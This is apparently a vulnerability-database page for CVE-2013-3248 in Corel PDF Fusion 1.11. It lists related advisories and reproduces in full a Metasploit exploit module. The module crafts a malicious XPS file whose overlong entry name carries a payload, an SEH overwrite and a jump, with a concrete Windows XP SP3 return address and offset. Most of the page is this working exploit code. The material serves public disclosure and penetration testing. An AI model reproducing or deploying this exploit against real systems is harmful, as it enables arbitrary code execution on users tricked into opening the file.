Corel PDF Fusion Stack Buffer Overflow

🗓️ 12 Jul 2013 00:00:00Reported by juan vazquezType

packetstorm🔗 packetstormsecurity.com👁 38 Views

Corel PDF Fusion Stack Buffer Overflow while handling XPS file with long entry name

Reporter	Title	Published	Views	Family All 15
0day.today	Corel PDF Fusion Stack Buffer Overflow Vulnerability	12 Jul 201300:00	–	zdt
Circl	CVE-2013-3248	13 Jul 201300:00	–	circl
Check Point Advisories	Corel PDF Fusion XPS Stack Buffer Overflow (CVE-2013-3248)	4 Nov 201300:00	–	checkpoint_advisories
CVE	CVE-2013-3248	3 Oct 201323:00	–	cve
Cvelist	CVE-2013-3248	3 Oct 201323:00	–	cvelist
Exploit DB	Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)	13 Jul 201300:00	–	exploitdb
Metasploit	Corel PDF Fusion Stack Buffer Overflow	11 Jul 201317:30	–	metasploit
NVD	CVE-2013-3248	3 Oct 201323:55	–	nvd
OpenVAS	Corel PDF Fusion 1.11 Multiple Vulnerabilities - Windows	15 Oct 201300:00	–	openvas
Prion	Design/Logic Flaw	3 Oct 201323:55	–	prion

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'rex/zip'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Corel PDF Fusion Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack-based buffer overflow vulnerability in version 1.11 of  
Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry  
names. In order for the payload to be executed, an attacker must convince the target  
user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the  
attacker can execute arbitrary code as the target user.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Kaveh Ghaemmaghami', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2013-3248' ],  
[ 'OSVDB', '94933' ],  
[ 'BID', '61010' ],  
[ 'URL', 'http://secunia.com/advisories/52707/' ]  
],  
'Platform' => [ 'win' ],  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 4000  
},  
'Targets' =>  
[  
# Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)  
# CorelFusion.exe 2.6.2.0  
# ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates  
[ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]  
],  
'DisclosureDate' => 'Jul 08 2013',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])  
], self.class)  
  
end  
  
  
def exploit  
template = [  
"[Content_Types].xml",  
"_rels/.rels",  
"docProps/thumbnail.jpeg",  
"docProps/core.xml",  
"FixedDocSeq.fdseq",  
"Documents/1/Pages/_rels/1.fpage.rels",  
"Documents/1/_rels/FixedDoc.fdoc.rels",  
"Documents/1/FixedDoc.fdoc",  
"Documents/1/Structure/Fragments/1.frag",  
"Documents/1/Structure/DocStructure.struct",  
"Documents/1/Pages/1.fpage",  
]  
  
xps = Rex::Zip::Archive.new  
template.each do |k|  
xps.add_file(k, rand_text_alpha(10 + rand(20)))  
end  
  
resources_length = "Resources/".length  
sploit = "Resources/"  
sploit << payload.encoded  
sploit << rand_text(target['Offset'] - sploit.length)  
sploit << generate_seh_record(target.ret)  
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length  
sploit << rand_text(1500) # Trigger exception  
  
xps.add_file(sploit, rand_text_alpha(10 + rand(20)))  
  
print_status("Creating '#{datastore['FILENAME']}' file...")  
file_create(xps.pack)  
end  
  
end  
`

12 Jul 2013 00:00Current

1.2Low risk

Vulners AI Score1.2

EPSS0.59529